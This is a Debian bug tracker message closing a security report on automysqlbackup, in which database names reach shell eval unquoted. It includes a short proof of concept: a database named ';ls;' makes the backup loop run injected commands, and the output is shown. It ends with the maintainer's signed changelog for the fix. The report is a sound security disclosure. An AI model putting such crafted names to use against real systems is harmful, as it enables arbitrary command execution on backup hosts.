Bug#706099: marked as done (automysqlbackup: Code injection via unsafe database names inside eval)

Debian Bug Tracking System Fri, 26 Apr 2013 00:36:25 -0700

Your message dated Fri, 26 Apr 2013 07:32:31 +0000
with message-id <e1uvd8x-0000du...@franck.debian.org>
and subject line Bug#706099: fixed in automysqlbackup 2.6+debian.3-1
has caused the Debian Bug report #706099,
regarding automysqlbackup: Code injection via unsafe database names inside eval
to be marked as done.


This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
706099: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=706099
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

--- Begin Message ---

Package: automysqlbackup
Version: 2.5-6
Severity: grave
Tags: security patch

This is related to http://bugs.debian.org/706095 as
autopostgresqlbackup is a fork of automysqlbackup.

In automysqlbackup, database names are used unmangled and unquoted
inside several evals:

# dgrep eval automysqlbackup 
/usr/sbin/automysqlbackup:#    used "eval" for "rm" commands to try and resolve 
rotation issues.
/usr/sbin/automysqlbackup:eval rm -f "$BACKUPDIR/latest/*"
/usr/sbin/automysqlbackup:      eval $PREBACKUP
/usr/sbin/automysqlbackup:              eval rm -fv 
"$BACKUPDIR/weekly/$DB/${DB}_week.$REMW.*" 
/usr/sbin/automysqlbackup:              eval rm -fv 
"$BACKUPDIR/daily/$DB/*.$DOW.sql.*" 
/usr/sbin/automysqlbackup:              eval rm -fv 
"$BACKUPDIR/weekly/week.$REMW.*" 
/usr/sbin/automysqlbackup:              eval rm -fv 
"$BACKUPDIR/daily/*.$DOW.sql.*" 
/usr/sbin/automysqlbackup:      eval $POSTBACKUP
/usr/sbin/automysqlbackup:eval rm -f "$LOGFILE"
/usr/sbin/automysqlbackup:eval rm -f "$LOGERR"
#

Proof of concept exploit by using code copy and pasted from the script
on the commandline. Depending on the configuration, users may be able
to create databases without root access:

# mysqladmin create ';ls;'
# DBNAMES="`mysql --defaults-file=/etc/mysql/debian.cnf --batch 
--skip-column-names -e "show databases"| sed 's/ /%/g'`"
# echo $DBNAMES 
information_schema ;ls; bangstat mysql performance_schema phpmyadmin test
# for DB in $DBNAMES; do eval echo rm -fv 
"$BACKUPDIR/weekly/$DB/${DB}_week.$REMW.*"; done
rm -fv /weekly/information_schema/information_schema_week..*
rm -fv /weekly/
acpid           automysqlbackup       console-setup  devpts        grub     
hobbit-client  locale  netdiag     nss      ntp-servers  rsyslog        tmpfs
apache2         autopostgresqlbackup  cron           dphys-config  halt     
hwclock        mbmon   networking  ntp      rcS          smartmontools  useradd
aptitude-robot  bsdmainutils          debsums        fail2ban      hddtemp  
keyboard       mdadm   nfs-common  ntpdate  rsync        ssh
-bash: /: Is a directory
acpid           automysqlbackup       console-setup  devpts        grub     
hobbit-client  locale  netdiag     nss      ntp-servers  rsyslog        tmpfs
apache2         autopostgresqlbackup  cron           dphys-config  halt     
hwclock        mbmon   networking  ntp      rcS          smartmontools  useradd
aptitude-robot  bsdmainutils          debsums        fail2ban      hddtemp  
keyboard       mdadm   nfs-common  ntpdate  rsync        ssh
-bash: _week..*: command not found
rm -fv /weekly/bangstat/bangstat_week..*
rm -fv /weekly/mysql/mysql_week..*
rm -fv /weekly/performance_schema/performance_schema_week..*
rm -fv /weekly/phpmyadmin/phpmyadmin_week..*
rm -fv /weekly/test/test_week..*
#

The patch is the same as in http://bugs.debian.org/706095 except for
maybe line numbers and possibly some context lines, but there's no
(relevant) difference in the relevant lines:

# diff -Bb  <(fgrep eval /usr/sbin/autopostgresqlbackup) <(fgrep eval 
/usr/sbin/automysqlbackup)
0a1
> #    used "eval" for "rm" commands to try and resolve rotation issues.

                Regards, Axel
-- 
 ,''`.  |  Axel Beckert <a...@debian.org>, http://people.debian.org/~abe/
: :' :  |  Debian Developer, ftp.ch.debian.org Admin
`. `'   |  1024D: F067 EA27 26B9 C3FC 1486  202E C09E 1D89 9593 0EDE
  `-    |  4096R: 2517 B724 C5F6 CA99 5329  6E61 2FF9 CD59 6126 16B5

--- End Message ---

--- Begin Message ---

Source: automysqlbackup
Source-Version: 2.6+debian.3-1

We believe that the bug you reported is fixed in the latest version of
automysqlbackup, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 706...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Thomas Goirand <z...@debian.org> (supplier of updated automysqlbackup package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Thu, 25 Apr 2013 18:34:36 +0800
Source: automysqlbackup
Binary: automysqlbackup
Architecture: source all
Version: 2.6+debian.3-1
Distribution: unstable
Urgency: high
Maintainer: Thomas Goirand <z...@debian.org>
Changed-By: Thomas Goirand <z...@debian.org>
Description: 
 automysqlbackup - daily, weekly and monthly backup for your MySQL database
Closes: 706099
Changes: 
 automysqlbackup (2.6+debian.3-1) unstable; urgency=high
 .
   * Fixes: Code injection via unsafe database names inside eval calls, thanks
     to Axel Beckert for reporting (Closes: #706099).
Checksums-Sha1: 
 a1550db742a5abdf1882b936188a7c5558f8e05f 1316 
automysqlbackup_2.6+debian.3-1.dsc
 8eb3a790a2d709eac024ed42b820a8455afc1610 8429 
automysqlbackup_2.6+debian.3.orig.tar.gz
 8351868e48f024f5da1dbcb5ff3ab41925a1ccad 6004 
automysqlbackup_2.6+debian.3-1.debian.tar.gz
 4615353ee17f7cf07ea4ead7a8f58af76dd725c4 14936 
automysqlbackup_2.6+debian.3-1_all.deb
Checksums-Sha256: 
 f28d9b8f9f3b4af1087a77484b589243ff999904952675ceb6d97d2e32b26dd1 1316 
automysqlbackup_2.6+debian.3-1.dsc
 106b9c01ad6116628d45d18ce26327485f05d25a64848eff60a5bb7e94957f53 8429 
automysqlbackup_2.6+debian.3.orig.tar.gz
 14d10d9898713ca3e69e604ffaccb3d50e022d2bfa6eef0f8486cd0c7b9e01e4 6004 
automysqlbackup_2.6+debian.3-1.debian.tar.gz
 61f9d4df46fbe5d48063d7dde4665d2ca329ce5f4cc19f54918d4d5010d12cb7 14936 
automysqlbackup_2.6+debian.3-1_all.deb
Files: 
 523c0dd4aefeb95b99cc176bbd700466 1316 admin extra 
automysqlbackup_2.6+debian.3-1.dsc
 51d65ffef4bf1c5d5b1c0d82f51420d2 8429 admin extra 
automysqlbackup_2.6+debian.3.orig.tar.gz
 05259a7af9a27566fc91c923ba799c32 6004 admin extra 
automysqlbackup_2.6+debian.3-1.debian.tar.gz
 67da55a247b86025704931b7b009d294 14936 admin extra 
automysqlbackup_2.6+debian.3-1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlF6K/oACgkQl4M9yZjvmkmNsQCfWGRrEmY+OYM6oV9rExvFTO4a
lKUAmgNev4zPkHu1uNs3HBz0pjDpZ7t4
=JVM6
-----END PGP SIGNATURE-----

--- End Message ---

Bug#706099: marked as done (automysqlbackup: Code injection via unsafe database names inside eval)

Reply via email to